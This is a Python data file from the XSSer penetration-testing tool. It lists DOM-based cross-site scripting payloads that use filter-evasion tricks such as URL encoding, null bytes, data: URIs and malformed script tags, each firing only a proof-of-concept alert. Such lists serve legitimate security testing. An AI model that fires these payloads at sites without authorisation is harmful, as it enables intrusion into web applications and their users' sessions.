DOM.py 3.6 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-"
  3. # vim: set expandtab tabstop=4 shiftwidth=4:
  4. """
  5. This file is part of the XSSer project, https://xsser.03c8.net
  6. Copyright (c) 2010/2020 | psy <epsylon@riseup.net>
  7. xsser is free software; you can redistribute it and/or modify it under
  8. the terms of the GNU General Public License as published by the Free
  9. Software Foundation version 3 of the License.
  10. xsser is distributed in the hope that it will be useful, but WITHOUT ANY
  11. WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
  12. FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
  13. details.
  14. You should have received a copy of the GNU General Public License along
  15. with xsser; if not, write to the Free Software Foundation, Inc., 51
  16. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  17. """
  18. ## This file contains different XSS fuzzing vectors.
  19. ## If you have some new, please email me to [epsylon@riseup.net]
  20. ## Happy Cross Hacking! ;)
  21. DOMvectors = [
  22. # { 'payload' : """?notname=PAYLOAD&""",
  23. # 'browser' : """[Document Object Model Injection]"""},
  24. # { 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
  25. # 'browser' : """[Document Object Model Injection]"""},
  26. # { 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""",
  27. # 'browser' : """[Document Object Model Injection]"""},
  28. # { 'payload' : """?name=Y%0d%0a%0d%0aPAYLOAD""",
  29. # 'browser' : """[Document Object Model Injection]"""},
  30. # { 'payload' : """?foobar=name=PAYLOAD&""",
  31. # 'browser' : """[Document Object Model Injection]"""},
  32. { 'payload':"""Y#<script>alert('PAYLOAD')</script>""",
  33. 'browser':"""[Document Object Model Injection]"""},
  34. { 'payload':"""Y#<%<!--'%><script>alert(PAYLOAD);</script -->""",
  35. 'browser':"""[Document Object Model Injection]"""},
  36. { 'payload':"""Y#<script ^__^>alert(PAYLOAD)</script ^__^""",
  37. 'browser':"""[Document Object Model Injection]"""},
  38. { 'payload':'''Y#<script src="data:text/javascript,alert(PAYLOAD)"></script>''',
  39. 'browser':"""[Document Object Model Injection]"""},
  40. { 'payload':"""Y#<script>+-+-1-+-+alert(PAYLOAD)</script>""",
  41. 'browser':"""[Document Object Model Injection]"""},
  42. { 'payload':"""Y#<script x> alert(PAYLOAD) </script 1=2""",
  43. 'browser':"""[Document Object Model Injection]"""},
  44. { 'payload':'''Y#<script>a=eval;b=alert;a(b(/ PAYLOAD/.source));</script>'">''',
  45. 'browser':"""[Document Object Model Injection]"""},
  46. { 'payload':'''Y#<script/y~~~>;alert(PAYLOAD);</script/Y~~~>''',
  47. 'browser':"""[Document Object Model Injection]"""},
  48. { 'payload':'''Y#%00“><script>alert(PAYLOAD)</script>''',
  49. 'browser':"""[Document Object Model Injection]"""},
  50. { 'payload':'''Y#%22%3E%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''',
  51. 'browser':"""[Document Object Model Injection]"""},
  52. { 'payload':'''Y#%3Cscript%3Ealert(PAYLOAD)%3B%3C%2Fscript%3E''',
  53. 'browser':"""[Document Object Model Injection]"""},
  54. { 'payload':'''Y#`"><%3Cscript>javascript:alert(PAYLOAD)</script>''',
  55. 'browser':"""[Document Object Model Injection]"""},
  56. { 'payload':'''Y#%3Cscript>javascript:alert(PAYLOAD)</script>''',
  57. 'browser':"""[Document Object Model Injection]"""},
  58. { 'payload':"""Y#<SCRIPT>a=/PAYLOAD/alert(a.source)</SCRIPT>""",
  59. 'browser':"""[Document Object Model Injection]"""}
  60. ]